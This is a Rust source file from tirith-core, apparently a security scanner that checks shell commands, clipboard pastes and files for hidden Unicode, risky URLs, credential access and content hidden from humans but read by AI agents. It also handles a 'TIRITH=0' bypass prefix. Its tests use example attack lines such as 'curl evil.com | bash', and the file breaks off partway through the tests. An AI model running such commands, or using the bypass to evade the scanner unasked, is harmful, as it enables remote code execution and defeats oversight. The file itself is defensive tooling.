tirith-core 0.3.0

use std::time::Instant;

use crate::extract::{self, ScanContext};
use crate::normalize;
use crate::policy::Policy;
use crate::tokenize::ShellType;
use crate::verdict::{Finding, Timings, Verdict};

/// Extract the raw path from a URL string before any normalization.
fn extract_raw_path_from_url(raw: &str) -> Option<String> {
    if let Some(idx) = raw.find("://") {
        let after = &raw[idx + 3..];
        if let Some(slash_idx) = after.find('/') {
            let path_start = &after[slash_idx..];
            let end = path_start.find(['?', '#']).unwrap_or(path_start.len());
            return Some(path_start[..end].to_string());
        }
    }
    None
}

/// Analysis context passed through the pipeline.
pub struct AnalysisContext {
    pub input: String,
    pub shell: ShellType,
    pub scan_context: ScanContext,
    pub raw_bytes: Option<Vec<u8>>,
    pub interactive: bool,
    pub cwd: Option<String>,
    /// File path being scanned (only populated for ScanContext::FileScan).
    pub file_path: Option<std::path::PathBuf>,
    /// Only populated for ScanContext::FileScan. When None, configfile checks use
    /// `file_path`'s parent as implicit repo root.
    pub repo_root: Option<String>,
    /// True when `file_path` was explicitly provided by the user as a config file.
    pub is_config_override: bool,
    /// Clipboard HTML content for rich-text paste analysis.
    /// Only populated when `tirith paste --html <path>` is used.
    pub clipboard_html: Option<String>,
}

/// Check if a VAR=VALUE word is `TIRITH=0`, stripping optional surrounding quotes
/// from the value (handles `TIRITH='0'` and `TIRITH="0"`).
fn is_tirith_zero_assignment(word: &str) -> bool {
    if let Some((name, raw_val)) = word.split_once('=') {
        let val = raw_val.trim_matches(|c: char| c == '\'' || c == '"');
        if name == "TIRITH" && val == "0" {
            return true;
        }
    }
    false
}

/// Check if the input contains an inline `TIRITH=0` bypass prefix.
/// Handles POSIX bare prefix (`TIRITH=0 cmd`), env wrappers (`env -i TIRITH=0 cmd`),
/// and PowerShell env syntax (`$env:TIRITH="0"; cmd`).
fn find_inline_bypass(input: &str, shell: ShellType) -> bool {
    use crate::tokenize;

    if matches!(shell, ShellType::Posix | ShellType::Fish) {
        let segments = tokenize::tokenize(input, shell);
        // The documented bypass shape is `TIRITH=0 <cmd> | <interp>`. Multi-segment
        // pipelines share an env (bypass applies to the whole pipeline), but
        // sequencing operators (`&&`, `||`, `;`, `&`) start independent commands
        // where bypass must NOT carry over.
        if !all_pipe_separated(&segments) || has_unquoted_ampersand(input, shell) {
            return false;
        }
    }

    let words = split_raw_words(input, shell);
    if words.is_empty() {
        return false;
    }

    // POSIX / Fish (Fish 3.1+): leading `VAR=VALUE` assignments, then optionally
    // an `env` wrapper, then the command. Walk past them looking for TIRITH=0.
    let mut idx = 0;
    while idx < words.len() && tokenize::is_env_assignment(&words[idx]) {
        if is_tirith_zero_assignment(&words[idx]) {
            return true;
        }
        idx += 1;
    }

    // If the first real word is `env`, parse its flags and assignments.
    if idx < words.len() {
        let cmd = words[idx].rsplit('/').next().unwrap_or(&words[idx]);
        let cmd = cmd.trim_matches(|c: char| c == '\'' || c == '"');
        if cmd == "env" {
            idx += 1;
            while idx < words.len() {
                let w = &words[idx];
                if w == "--" {
                    idx += 1;
                    break;
                }
                if tokenize::is_env_assignment(w) {
                    if is_tirith_zero_assignment(w) {
                        return true;
                    }
                    idx += 1;
                    continue;
                }
                if w.starts_with('-') {
                    if w.starts_with("--") {
                        if env_long_flag_takes_value(w) && !w.contains('=') {
                            idx += 2;
                        } else {
                            idx += 1;
                        }
                        continue;
                    }
                    // Short flags that take a separate value arg.
                    if w == "-u" || w == "-C" || w == "-S" {
                        idx += 2;
                        continue;
                    }
                    idx += 1;
                    continue;
                }
                // Non-flag, non-assignment: this is the command word.
                break;
            }
            while idx < words.len() && tokenize::is_env_assignment(&words[idx]) {
                if is_tirith_zero_assignment(&words[idx]) {
                    return true;
                }
                idx += 1;
            }
        }
    }

    // PowerShell: `$env:TIRITH="0"` (single word) or `$env:TIRITH = "0"` (spaced).
    if shell == ShellType::PowerShell {
        for word in &words {
            if is_powershell_tirith_bypass(word) {
                return true;
            }
        }
        if words.len() >= 3 {
            for window in words.windows(3) {
                if is_powershell_env_ref(&window[0], "TIRITH")
                    && window[1] == "="
                    && strip_surrounding_quotes(&window[2]) == "0"
                {
                    return true;
                }
            }
        }
    }

    // cmd.exe: `set TIRITH="0"` stores the literal `"0"` (with quotes), so only
    // bare `TIRITH=0` and whole-token-quoted `"TIRITH=0"` are real bypasses.
    // Inner double quotes and any single quotes must NOT be stripped.
    if shell == ShellType::Cmd && words.len() >= 2 {
        let first = words[0].to_lowercase();
        if first == "set" {
            let second = strip_double_quotes_only(&words[1]);
            if let Some((name, val)) = second.split_once('=') {
                if name == "TIRITH" && val == "0" {
                    return true;
                }
            }
        }
    }

    false
}

fn env_long_flag_takes_value(flag: &str) -> bool {
    let name = flag.split_once('=').map(|(name, _)| name).unwrap_or(flag);
    matches!(name, "--unset" | "--chdir" | "--split-string")
}

/// Check if a word is `$env:TIRITH=0` with optional quotes around the value.
/// The `$env:` prefix is matched case-insensitively (PowerShell convention).
fn is_powershell_tirith_bypass(word: &str) -> bool {
    if !word.starts_with('$') || word.len() < "$env:TIRITH=0".len() {
        return false;
    }
    let after_dollar = &word[1..];
    if !after_dollar
        .get(..4)
        .is_some_and(|s| s.eq_ignore_ascii_case("env:"))
    {
        return false;
    }
    let after_env = &after_dollar[4..];
    if !after_env
        .get(..7)
        .is_some_and(|s| s.eq_ignore_ascii_case("TIRITH="))
    {
        return false;
    }
    let value = &after_env[7..];
    strip_surrounding_quotes(value) == "0"
}

/// Check if a word is a PowerShell env var reference `$env:VARNAME` (no assignment).
fn is_powershell_env_ref(word: &str, var_name: &str) -> bool {
    if !word.starts_with('$') {
        return false;
    }
    let after_dollar = &word[1..];
    if !after_dollar
        .get(..4)
        .is_some_and(|s| s.eq_ignore_ascii_case("env:"))
    {
        return false;
    }
    after_dollar[4..].eq_ignore_ascii_case(var_name)
}

/// Strip a single layer of matching quotes (single or double) from a string.
fn strip_surrounding_quotes(s: &str) -> &str {
    if s.len() >= 2
        && ((s.starts_with('"') && s.ends_with('"')) || (s.starts_with('\'') && s.ends_with('\'')))
    {
        &s[1..s.len() - 1]
    } else {
        s
    }
}

/// Strip a single layer of matching double quotes only. For Cmd, single quotes are literal.
fn strip_double_quotes_only(s: &str) -> &str {
    if s.len() >= 2 && s.starts_with('"') && s.ends_with('"') {
        &s[1..s.len() - 1]
    } else {
        s
    }
}

/// Split input into raw words respecting quotes (for bypass/self-invocation parsing).
/// Unlike tokenize(), this doesn't split on pipes/semicolons — just whitespace-splits
/// the raw input to inspect the first segment's words.
///
/// Shell-aware: POSIX uses backslash as escape inside double-quotes and bare context;
/// PowerShell uses backtick (`` ` ``) instead.
fn split_raw_words(input: &str, shell: ShellType) -> Vec<String> {
    let escape_char = match shell {
        ShellType::PowerShell => '`',
        ShellType::Cmd => '^',
        _ => '\\',
    };

    // Stop at the first unquoted segment boundary — we only care about the
    // first command's words for bypass detection.
    let mut words = Vec::new();
    let mut current = String::new();
    let chars: Vec<char> = input.chars().collect();
    let len = chars.len();
    let mut i = 0;

    while i < len {
        let ch = chars[i];
        match ch {
            ' ' | '\t' if !current.is_empty() => {
                words.push(current.clone());
                current.clear();
                i += 1;
                while i < len && (chars[i] == ' ' || chars[i] == '\t') {
                    i += 1;
                }
            }
            ' ' | '\t' => {
                i += 1;
            }
            '|' | '\n' | '&' => break,
            ';' if shell != ShellType::Cmd => break,
            '#' if shell == ShellType::PowerShell => break,
            '\'' if shell != ShellType::Cmd => {
                current.push(ch);
                i += 1;
                while i < len && chars[i] != '\'' {
                    current.push(chars[i]);
                    i += 1;
                }
                if i < len {
                    current.push(chars[i]);
                    i += 1;
                }
            }
            '"' => {
                current.push(ch);
                i += 1;
                while i < len && chars[i] != '"' {
                    if chars[i] == escape_char && i + 1 < len {
                        current.push(chars[i]);
                        current.push(chars[i + 1]);
                        i += 2;
                    } else {
                        current.push(chars[i]);
                        i += 1;
                    }
                }
                if i < len {
                    current.push(chars[i]);
                    i += 1;
                }
            }
            c if c == escape_char && i + 1 < len => {
                current.push(chars[i]);
                current.push(chars[i + 1]);
                i += 2;
            }
            _ => {
                current.push(ch);
                i += 1;
            }
        }
    }
    if !current.is_empty() {
        words.push(current);
    }
    words
}

/// Whether all non-leading segments are joined only by pipe operators (`|`, `|&`).
///
/// Returns `true` for a single segment. Used to distinguish the documented
/// `TIRITH=0 cmd | interp` bypass shape from sequencing chains like
/// `TIRITH=0 cmd && evil` where the bypass must not apply to the second command.
fn all_pipe_separated(segments: &[crate::tokenize::Segment]) -> bool {
    segments
        .iter()
        .skip(1)
        .all(|s| matches!(s.preceding_separator.as_deref(), Some("|") | Some("|&")))
}

/// Check if input contains an unquoted `&` (backgrounding operator).
fn has_unquoted_ampersand(input: &str, shell: ShellType) -> bool {
    let escape_char = match shell {
        ShellType::PowerShell => '`',
        ShellType::Cmd => '^',
        _ => '\\',
    };
    let chars: Vec<char> = input.chars().collect();
    let len = chars.len();
    let mut i = 0;
    while i < len {
        match chars[i] {
            '\'' if shell != ShellType::Cmd => {
                i += 1;
                while i < len && chars[i] != '\'' {
                    i += 1;
                }
                if i < len {
                    i += 1;
                }
            }
            '"' => {
                i += 1;
                while i < len && chars[i] != '"' {
                    if chars[i] == escape_char && i + 1 < len {
                        i += 2;
                    } else {
                        i += 1;
                    }
                }
                if i < len {
                    i += 1;
                }
            }
            c if c == escape_char && i + 1 < len => {
                i += 2;
            }
            '&' => return true,
            _ => i += 1,
        }
    }
    false
}

/// Run the tiered analysis pipeline.
pub fn analyze(ctx: &AnalysisContext) -> Verdict {
    analyze_inner(ctx).0
}

/// Run the tiered analysis pipeline, returning the loaded policy alongside the verdict.
///
/// Use this from enforcement callers (check, gateway, MCP) that need the policy
/// for post-processing — avoids a redundant `Policy::discover()` call.
pub fn analyze_returning_policy(ctx: &AnalysisContext) -> (Verdict, Policy) {
    analyze_inner(ctx)
}

/// Shared implementation for `analyze()` and `analyze_returning_policy()`.
fn analyze_inner(ctx: &AnalysisContext) -> (Verdict, Policy) {
    let start = Instant::now();

    let tier0_start = Instant::now();
    let bypass_env = std::env::var("TIRITH").ok().as_deref() == Some("0");
    // Inline bypass (`TIRITH=0 cmd | sh`) is honored ONLY in Exec context.
    // Paste content is attacker-controllable (clipboard can be crafted) and
    // FileScan has no notion of a typed prefix, so a `TIRITH=0` token in those
    // contexts must not grant bypass. Process-level TIRITH=0 env still applies
    // in every context.
    let bypass_inline =
        ctx.scan_context == ScanContext::Exec && find_inline_bypass(&ctx.input, ctx.shell);
    let bypass_requested = bypass_env || bypass_inline;
    let tier0_ms = tier0_start.elapsed().as_secs_f64() * 1000.0;

    let tier1_start = Instant::now();

    // Paste-only: byte-level scan catches control chars that never make it
    // into the URL/regex view.
    let byte_scan_triggered = if ctx.scan_context == ScanContext::Paste {
        if let Some(ref bytes) = ctx.raw_bytes {
            let scan = extract::scan_bytes(bytes);
            scan.has_ansi_escapes
                || scan.has_control_chars
                || scan.has_bidi_controls
                || scan.has_zero_width
                || scan.has_invalid_utf8
                || scan.has_unicode_tags
                || scan.has_variation_selectors
                || scan.has_invisible_math_operators
                || scan.has_invisible_whitespace
                || scan.has_hangul_fillers
                || scan.has_confusable_text
        } else {
            false
        }
    } else {
        false
    };

    let regex_triggered = extract::tier1_scan(&ctx.input, ctx.scan_context);

    // Exec-only: catch bidi/zero-width/invisible bytes even when no URL fired.
    // `tirith diff/score/why/receipt/explain` URLs typed by the user are
    // carved out because they're inspection targets — only the eight Unicode-
    // style rule classes filtered at tier 3 are affected by this carveout.
    let inert_range = if ctx.scan_context == ScanContext::Exec {
        extract::tirith_inert_arg_range(&ctx.input, ctx.shell)
    } else {
        None
    };
    let exec_bidi_triggered = if ctx.scan_context == ScanContext::Exec {
        let scan = extract::scan_bytes(ctx.input.as_bytes());
        let scan = match inert_range.as_ref() {
            Some(r) => scan.with_ignored_range(r),
            None => scan,
        };
        scan.has_bidi_controls
            || scan.has_zero_width
            || scan.has_unicode_tags
            || scan.has_variation_selectors
            || scan.has_invisible_math_operators
            || scan.has_invisible_whitespace
            || scan.has_hangul_fillers
            || scan.has_confusable_text
    } else {
        false
    };

    let tier1_ms = tier1_start.elapsed().as_secs_f64() * 1000.0;

    if !byte_scan_triggered && !regex_triggered && !exec_bidi_triggered {
        let total_ms = start.elapsed().as_secs_f64() * 1000.0;
        return (
            Verdict::allow_fast(
                1,
                Timings {
                    tier0_ms,
                    tier1_ms,
                    tier2_ms: None,
                    tier3_ms: None,
                    total_ms,
                },
            ),
            // discover_partial is local-only and cheap; callers still need DLP
            // patterns for audit redaction even on fast-exit.
            Policy::discover_partial(ctx.cwd.as_deref()),
        );
    }

    let tier2_start = Instant::now();

    if bypass_requested {
        let policy = Policy::discover_partial(ctx.cwd.as_deref());
        let allow_bypass = if ctx.interactive {
            policy.allow_bypass_env
        } else {
            policy.allow_bypass_env_noninteractive
        };

        if allow_bypass {
            let tier2_ms = tier2_start.elapsed().as_secs_f64() * 1000.0;
            let total_ms = start.elapsed().as_secs_f64() * 1000.0;
            let mut verdict = Verdict::allow_fast(
                2,
                Timings {
                    tier0_ms,
                    tier1_ms,
                    tier2_ms: Some(tier2_ms),
                    tier3_ms: None,
                    total_ms,
                },
            );
            verdict.bypass_requested = true;
            verdict.bypass_honored = true;
            verdict.interactive_detected = ctx.interactive;
            verdict.policy_path_used = policy.path.clone();
            crate::audit::log_verdict(
                &verdict,
                &ctx.input,
                None,
                None,
                &policy.dlp_custom_patterns,
            );
            return (verdict, policy);
        }
    }

    let mut policy = Policy::discover(ctx.cwd.as_deref());
    policy.load_user_lists();
    policy.load_org_lists(ctx.cwd.as_deref());
    policy.load_trust_entries(ctx.cwd.as_deref());

    // Fail-open: None when the DB is unavailable.
    let threat_db: Option<std::sync::Arc<crate::threatdb::ThreatDb>> =
        crate::threatdb::ThreatDb::cached();

    let tier2_ms = tier2_start.elapsed().as_secs_f64() * 1000.0;

    let tier3_start = Instant::now();
    let mut findings = Vec::new();

    let mut extracted = Vec::new();

    if ctx.scan_context == ScanContext::FileScan {
        // FileScan runs byte-scan + configfile/codefile/rendered rules only.
        // It does NOT run command/env/URL-extraction rules — the input isn't a
        // command line, so those rules would produce nonsense findings.
        let byte_input = if let Some(ref bytes) = ctx.raw_bytes {
            bytes.as_slice()
        } else {
            ctx.input.as_bytes()
        };
        let byte_findings = crate::rules::terminal::check_bytes(byte_input);
        findings.extend(byte_findings);

        findings.extend(crate::rules::configfile::check(
            &ctx.input,
            ctx.file_path.as_deref(),
            ctx.repo_root.as_deref().map(std::path::Path::new),
            ctx.is_config_override,
        ));

        if crate::rules::codefile::is_code_file(
            ctx.file_path.as_deref().and_then(|p| p.to_str()),
            &ctx.input,
        ) {
            findings.extend(crate::rules::codefile::check(
                &ctx.input,
                ctx.file_path.as_deref().and_then(|p| p.to_str()),
            ));
        }

        if crate::rules::rendered::is_renderable_file(ctx.file_path.as_deref()) {
            // PDFs need their own parser; everything else is treated as text.
            let is_pdf = ctx
                .file_path
                .as_deref()
                .and_then(|p| p.extension())
                .and_then(|e| e.to_str())
                .map(|e| e.eq_ignore_ascii_case("pdf"))
                .unwrap_or(false);

            if is_pdf {
                let pdf_bytes = ctx.raw_bytes.as_deref().unwrap_or(ctx.input.as_bytes());
                findings.extend(crate::rules::rendered::check_pdf(pdf_bytes));
            } else {
                findings.extend(crate::rules::rendered::check(
                    &ctx.input,
                    ctx.file_path.as_deref(),
                ));
            }
        }
    } else {
        if ctx.scan_context == ScanContext::Paste {
            if let Some(ref bytes) = ctx.raw_bytes {
                let byte_findings = crate::rules::terminal::check_bytes(bytes);
                findings.extend(byte_findings);
            }
            let multiline_findings = crate::rules::terminal::check_hidden_multiline(&ctx.input);
            findings.extend(multiline_findings);

            if let Some(ref html) = ctx.clipboard_html {
                let clipboard_findings =
                    crate::rules::terminal::check_clipboard_html(html, &ctx.input);
                findings.extend(clipboard_findings);
            }
        }

        if ctx.scan_context == ScanContext::Exec {
            let byte_input = ctx.input.as_bytes();
            let scan = extract::scan_bytes(byte_input);
            // Same inert-range carveout as tier-1 so tier-3 findings agree
            // with `exec_bidi_triggered`.
            let scan = match inert_range.as_ref() {
                Some(r) => scan.with_ignored_range(r),
                None => scan,
            };
            if scan.has_bidi_controls
                || scan.has_zero_width
                || scan.has_unicode_tags
                || scan.has_variation_selectors
                || scan.has_invisible_math_operators
                || scan.has_invisible_whitespace
                || scan.has_hangul_fillers
                || scan.has_confusable_text
            {
                // Push the inert range down into check_bytes itself: rules
                // emitting `Evidence::Text` (e.g. UnicodeTags) have no byte
                // offset to post-filter against, so they must be suppressed
                // at scan time.
                let ignore_ranges: &[std::ops::Range<usize>] = inert_range.as_slice();
                let byte_findings =
                    crate::rules::terminal::check_bytes_with_ignore(byte_input, ignore_ranges);
                // Exec context keeps invisible-char findings only — ANSI/control
                // escape rules don't apply to typed commands.
                findings.extend(byte_findings.into_iter().filter(|f| {
                    matches!(
                        f.rule_id,
                        crate::verdict::RuleId::BidiControls
                            | crate::verdict::RuleId::ZeroWidthChars
                            | crate::verdict::RuleId::UnicodeTags
                            | crate::verdict::RuleId::InvisibleMathOperator
                            | crate::verdict::RuleId::VariationSelector
                            | crate::verdict::RuleId::InvisibleWhitespace
                            | crate::verdict::RuleId::HangulFiller
                            | crate::verdict::RuleId::ConfusableText
                    )
                }));
            }
        }

        extracted = extract::extract_urls(&ctx.input, ctx.shell);

        for url_info in &extracted {
            // url::Url percent-encodes non-ASCII on parse, so non-ASCII path
            // rules need the raw (pre-parse) path instead.
            let raw_path = extract_raw_path_from_url(&url_info.raw);
            let normalized_path = url_info.parsed.path().map(normalize::normalize_path);

            let hostname_findings = crate::rules::hostname::check(&url_info.parsed, &policy);
            findings.extend(hostname_findings);

            let path_findings = crate::rules::path::check(
                &url_info.parsed,
                normalized_path.as_ref(),
                raw_path.as_deref(),
            );
            findings.extend(path_findings);

            let transport_findings =
                crate::rules::transport::check(&url_info.parsed, url_info.in_sink_context);
            findings.extend(transport_findings);

            let ecosystem_findings = crate::rules::ecosystem::check(&url_info.parsed);
            findings.extend(ecosystem_findings);
        }

        // Threat intel rules are a local DB lookup — no network I/O on the hot path.
        let threat_findings = crate::rules::threatintel::check(
            &ctx.input,
            ctx.shell,
            &extracted,
            threat_db.as_deref(),
        );
        findings.extend(threat_findings);

        let command_findings = crate::rules::command::check(
            &ctx.input,
            ctx.shell,
            ctx.cwd.as_deref(),
            ctx.scan_context,
        );
        findings.extend(command_findings);

        let cred_findings =
            crate::rules::credential::check(&ctx.input, ctx.shell, ctx.scan_context);
        findings.extend(cred_findings);

        let env_findings = crate::rules::environment::check(&crate::rules::environment::RealEnv);
        findings.extend(env_findings);

        if !policy.network_deny.is_empty() {
            let net_findings = crate::rules::command::check_network_policy(
                &ctx.input,
                ctx.shell,
                &policy.network_deny,
                &policy.network_allow,
            );
            findings.extend(net_findings);
        }
    }

    if !policy.custom_rules.is_empty() {
        let compiled = crate::rules::custom::compile_rules(&policy.custom_rules);
        let custom_findings = crate::rules::custom::check(&ctx.input, ctx.scan_context, &compiled);
        findings.extend(custom_findings);
    }

    for finding in &mut findings {
        if let Some(override_sev) = policy.severity_override(&finding.rule_id) {
            finding.severity = override_sev;
        }
    }

    // A blocklist hit on any extracted URL yields a fresh Critical finding so
    // the final verdict escalates to Block regardless of other rules.
    for url_info in &extracted {
        if policy.is_blocklisted(&url_info.raw) {
            findings.push(Finding {
                rule_id: crate::verdict::RuleId::PolicyBlocklisted,
                severity: crate::verdict::Severity::Critical,
                title: "URL matches blocklist".to_string(),
                description: format!("URL '{}' matches a blocklist pattern", url_info.raw),
                evidence: vec![crate::verdict::Evidence::Url {
                    raw: url_info.raw.clone(),
                }],
                human_view: None,
                agent_view: None,
                mitre_id: None,
                custom_rule_id: None,
            });
        }
    }

    // Allowlist drops findings whose URLs are allowlisted, but blocklist wins
    // when both match: blocklisted URLs keep their findings.
    if !policy.allowlist.is_empty() || !policy.allowlist_rules.is_empty() {
        let blocklisted_urls: Vec<&str> = extracted
            .iter()
            .filter(|u| policy.is_blocklisted(&u.raw))
            .map(|u| u.raw.as_str())
            .collect();

        findings.retain(|f| {
            let urls_in_evidence: Vec<&str> = f
                .evidence
                .iter()
                .filter_map(|e| match e {
                    crate::verdict::Evidence::Url { raw } => Some(raw.as_str()),
                    _ => None,
                })
                .collect();

            if urls_in_evidence.is_empty() {
                return true;
            }

            let rule_allowlisted = |url: &str| {
                policy.is_allowlisted_for_rule(&f.rule_id.to_string(), url)
                    || f.custom_rule_id.as_deref().is_some_and(|custom_rule_id| {
                        policy.is_allowlisted_for_rule(custom_rule_id, url)
                    })
            };

            // Keep when any referenced URL is blocklisted; otherwise drop only
            // if every referenced URL is allowlisted for this finding.
            urls_in_evidence
                .iter()
                .any(|url| blocklisted_urls.contains(url))
                || !urls_in_evidence
                    .iter()
                    .all(|url| policy.is_allowlisted(url) || rule_allowlisted(url))
        });
    }

    enrich_pro(&mut findings);
    enrich_team(&mut findings);

    crate::rule_metadata::filter_early_access(&mut findings, crate::license::Tier::Enterprise);

    let tier3_ms = tier3_start.elapsed().as_secs_f64() * 1000.0;
    let total_ms = start.elapsed().as_secs_f64() * 1000.0;

    let mut verdict = Verdict::from_findings(
        findings,
        3,
        Timings {
            tier0_ms,
            tier1_ms,
            tier2_ms: Some(tier2_ms),
            tier3_ms: Some(tier3_ms),
            total_ms,
        },
    );
    verdict.bypass_requested = bypass_requested;
    verdict.bypass_available = if ctx.interactive {
        policy.allow_bypass_env
    } else {
        policy.allow_bypass_env_noninteractive
    };
    verdict.interactive_detected = ctx.interactive;
    verdict.policy_path_used = policy.path.clone();
    verdict.urls_extracted_count = Some(extracted.len());

    (verdict, policy)
}

/// Filter a verdict's findings by paranoia level.
///
/// Output-layer only — the engine always detects everything. CLI/MCP call
/// this after `analyze()` to reduce noise at lower paranoia levels.
///
/// - Paranoia 1-2: Medium+ findings only
/// - Paranoia 3: also show Low findings
/// - Paranoia 4: also show Info findings
pub fn filter_findings_by_paranoia(verdict: &mut Verdict, paranoia: u8) {
    retain_by_paranoia(&mut verdict.findings, paranoia);
    verdict.action = recalculate_action(&verdict.findings);
}

/// Filter a Vec<Finding> by paranoia level.
/// Same logic as `filter_findings_by_paranoia` but operates on raw findings.
pub fn filter_findings_by_paranoia_vec(findings: &mut Vec<Finding>, paranoia: u8) {
    retain_by_paranoia(findings, paranoia);
}

/// Recalculate verdict action from the current findings (same logic as `Verdict::from_findings`).
fn recalculate_action(findings: &[Finding]) -> crate::verdict::Action {
    use crate::verdict::{Action, Severity};
    if findings.is_empty() {
        return Action::Allow;
    }
    let max_severity = findings
        .iter()
        .map(|f| f.severity)
        .max()
        .unwrap_or(Severity::Low);
    match max_severity {
        Severity::Critical | Severity::High => Action::Block,
        Severity::Medium | Severity::Low => Action::Warn,
        Severity::Info => Action::Allow,
    }
}

/// Shared paranoia retention logic.
fn retain_by_paranoia(findings: &mut Vec<Finding>, paranoia: u8) {
    let effective = paranoia.min(4);

    findings.retain(|f| match f.severity {
        crate::verdict::Severity::Info => effective >= 4,
        crate::verdict::Severity::Low => effective >= 3,
        _ => true,
    });
}

/// Pro enrichment: dual-view, decoded content, cloaking diffs, line numbers.
fn enrich_pro(findings: &mut [Finding]) {
    for finding in findings.iter_mut() {
        match finding.rule_id {
            // Rendered-content findings carry a dual view: what the human sees
            // vs. what the AI agent processes.
            crate::verdict::RuleId::HiddenCssContent => {
                finding.human_view =
                    Some("Content hidden via CSS — invisible in rendered view".into());
                finding.agent_view = Some(format!(
                    "AI agent sees full text including CSS-hidden content. {}",
                    evidence_summary(&finding.evidence)
                ));
            }
            crate::verdict::RuleId::HiddenColorContent => {
                finding.human_view =
                    Some("Text blends with background — invisible to human eye".into());
                finding.agent_view = Some(format!(
                    "AI agent reads text regardless of color contrast. {}",
                    evidence_summary(&finding.evidence)
                ));
            }
            crate::verdict::RuleId::HiddenHtmlAttribute => {
                finding.human_view =
                    Some("Elements marked hidden/aria-hidden — not displayed".into());
                finding.agent_view = Some(format!(
                    "AI agent processes hidden element content. {}",
                    evidence_summary(&finding.evidence)
                ));
            }
            crate::verdict::RuleId::HtmlComment => {
                finding.human_view = Some("HTML comments not rendered in browser".into());
                finding.agent_view = Some(format!(
                    "AI agent reads comment content as context. {}",
                    evidence_summary(&finding.evidence)
                ));
            }
            crate::verdict::RuleId::MarkdownComment => {
                finding.human_view = Some("Markdown comments not rendered in preview".into());
                finding.agent_view = Some(format!(
                    "AI agent processes markdown comment content. {}",
                    evidence_summary(&finding.evidence)
                ));
            }
            crate::verdict::RuleId::PdfHiddenText => {
                finding.human_view = Some("Sub-pixel text invisible in PDF viewer".into());
                finding.agent_view = Some(format!(
                    "AI agent extracts all text including sub-pixel content. {}",
                    evidence_summary(&finding.evidence)
                ));
            }
            crate::verdict::RuleId::ClipboardHidden => {
                finding.human_view =
                    Some("Hidden content in clipboard HTML not visible in paste preview".into());
                finding.agent_view = Some(format!(
                    "AI agent processes full clipboard including hidden HTML. {}",
                    evidence_summary(&finding.evidence)
                ));
            }
            _ => {}
        }
    }
}

/// Summarize evidence entries for enrichment text.
fn evidence_summary(evidence: &[crate::verdict::Evidence]) -> String {
    let details: Vec<&str> = evidence
        .iter()
        .filter_map(|e| {
            if let crate::verdict::Evidence::Text { detail } = e {
                Some(detail.as_str())
            } else {
                None
            }
        })
        .take(3)
        .collect();
    if details.is_empty() {
        String::new()
    } else {
        format!("Details: {}", details.join("; "))
    }
}

/// Team enrichment: MITRE ATT&CK classification.
/// Uses the generated `mitre_id_for_rule` from `rule_explanations.toml` (single source of truth).
fn enrich_team(findings: &mut [Finding]) {
    for finding in findings.iter_mut() {
        if finding.mitre_id.is_none() {
            finding.mitre_id =
                crate::rule_explanations::mitre_id_for_rule(finding.rule_id).map(String::from);
        }
    }
}

#[cfg(test)]
mod tests {
    use super::*;
    #[test]
    fn test_exec_bidi_without_url() {
        // Bidi control alone (no URL) must reach tier 3; else the exec path
        // would fast-exit and miss the attack.
        let input = format!("echo hello{}world", '\u{202E}');
        let ctx = AnalysisContext {
            input,
            shell: ShellType::Posix,
            scan_context: ScanContext::Exec,
            raw_bytes: None,
            interactive: true,
            cwd: None,
            file_path: None,
            repo_root: None,
            is_config_override: false,
            clipboard_html: None,
        };
        let verdict = analyze(&ctx);
        assert!(
            verdict.tier_reached >= 3,
            "bidi in exec should reach tier 3, got tier {}",
            verdict.tier_reached
        );
        assert!(
            verdict
                .findings
                .iter()
                .any(|f| matches!(f.rule_id, crate::verdict::RuleId::BidiControls)),
            "should detect bidi controls in exec context"
        );
    }

    #[test]
    fn test_paranoia_filter_suppresses_info_low() {
        use crate::verdict::{Finding, RuleId, Severity, Timings, Verdict};

        let findings = vec![
            Finding {
                // Synthetic Info finding; any rule_id works — we just need one
                // with Severity::Info for the filter to drop.
                rule_id: RuleId::NonStandardPort,
                severity: Severity::Info,
                title: "info finding".into(),
                description: String::new(),
                evidence: vec![],
                human_view: None,
                agent_view: None,
                mitre_id: None,
                custom_rule_id: None,
            },
            Finding {
                rule_id: RuleId::InvisibleWhitespace,
                severity: Severity::Low,
                title: "low finding".into(),
                description: String::new(),
                evidence: vec![],
                human_view: None,
                agent_view: None,
                mitre_id: None,
                custom_rule_id: None,
            },
            Finding {
                rule_id: RuleId::HiddenCssContent,
                severity: Severity::High,
                title: "high finding".into(),
                description: String::new(),
                evidence: vec![],
                human_view: None,
                agent_view: None,
                mitre_id: None,
                custom_rule_id: None,
            },
        ];

        let timings = Timings {
            tier0_ms: 0.0,
            tier1_ms: 0.0,
            tier2_ms: None,
            tier3_ms: None,
            total_ms: 0.0,
        };

        let mut verdict = Verdict::from_findings(findings.clone(), 3, timings.clone());
        filter_findings_by_paranoia(&mut verdict, 1);
        assert_eq!(
            verdict.findings.len(),
            1,
            "paranoia 1 should keep only Medium+"
        );
        assert_eq!(verdict.findings[0].severity, Severity::High);

        let mut verdict = Verdict::from_findings(findings.clone(), 3, timings.clone());
        filter_findings_by_paranoia(&mut verdict, 2);
        assert_eq!(
            verdict.findings.len(),
            1,
            "paranoia 2 should keep only Medium+"
        );
    }

    #[test]
    fn test_inline_bypass_bare_prefix() {
        assert!(find_inline_bypass(
            "TIRITH=0 curl evil.com",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_env_wrapper() {
        assert!(find_inline_bypass(
            "env TIRITH=0 curl evil.com",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_env_i() {
        assert!(find_inline_bypass(
            "env -i TIRITH=0 curl evil.com",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_env_u_skip() {
        assert!(find_inline_bypass(
            "env -u TIRITH TIRITH=0 curl evil.com",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_usr_bin_env() {
        assert!(find_inline_bypass(
            "/usr/bin/env TIRITH=0 curl evil.com",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_env_dashdash() {
        assert!(find_inline_bypass(
            "env -- TIRITH=0 curl evil.com",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_no_inline_bypass() {
        assert!(!find_inline_bypass(
            "curl evil.com | bash",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_powershell_env() {
        assert!(find_inline_bypass(
            "$env:TIRITH=\"0\"; curl evil.com",
            ShellType::PowerShell
        ));
    }

    #[test]
    fn test_inline_bypass_powershell_env_no_quotes() {
        assert!(find_inline_bypass(
            "$env:TIRITH=0; curl evil.com",
            ShellType::PowerShell
        ));
    }

    #[test]
    fn test_inline_bypass_powershell_env_single_quotes() {
        assert!(find_inline_bypass(
            "$env:TIRITH='0'; curl evil.com",
            ShellType::PowerShell
        ));
    }

    #[test]
